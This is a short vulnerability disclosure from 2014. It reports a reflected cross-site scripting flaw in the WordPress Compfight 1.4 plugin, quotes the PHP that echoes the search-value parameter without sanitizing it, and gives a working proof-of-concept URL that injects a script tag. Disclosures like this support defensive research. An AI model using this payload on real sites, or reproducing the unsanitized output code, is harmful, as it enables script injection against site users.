######################
# Exploit Title : WordPress Compfight 1.4 Authenticated Cross Site Scripting
# Exploit Author : Claudio Viviani - HomeLab IT
# Vendor Homepage : http://wordpress.org/plugins/easy-banners/
# Software Link : http://downloads.wordpress.org/plugin/compfight.1.4.zip
# Date : 2014-07-03
# Tested on : Windows 7 / Mozilla Firefox
######################
# Location :
http://localhost/wp-content/plugins/compfight/compfight-search.php
######################
# Vulnerable code :
if (!$search_value) {
$input_text = 'Enter Keyword(s)';
} else {
$input_text = $search_value;
}
if ($show_title) {
$output .= '<h3 class="cf_search_title">Compfight</h3>';
$output .= '<p class="cf_search_subtitle">Locate the visual inspiration<br/>you need. Super fast!</p>';
}
$output .= '<form method="GET" action="" id="cf-form">';
$output .= '<input type="text" name="search-value" id="search-value" value="' . $input_text . '" onClick="javascript:if(this.value==\'Enter Keyword(s)\') { this.value = \'\'; };" />';
$output .= '<input type="submit" name="search" id="search" value="Search" class="button" />';
$output .= '</form>';
$input_text variable not sanitized
######################
Exploit Code:
http://localhost/plugins/compfight/compfight-search.php?search-value='"/><script>alert(1);</script>&search=Search
#####################
Discovered By : Claudio Viviani
http://www.homelab.it
[email protected]
https://www.facebook.com/homelabit
https://twitter.com/homelabit
https://plus.google.com/+HomelabIt1/
https://www.youtube.com/channel/UCqqmSdMqf_exicCe_DjlBww
#####################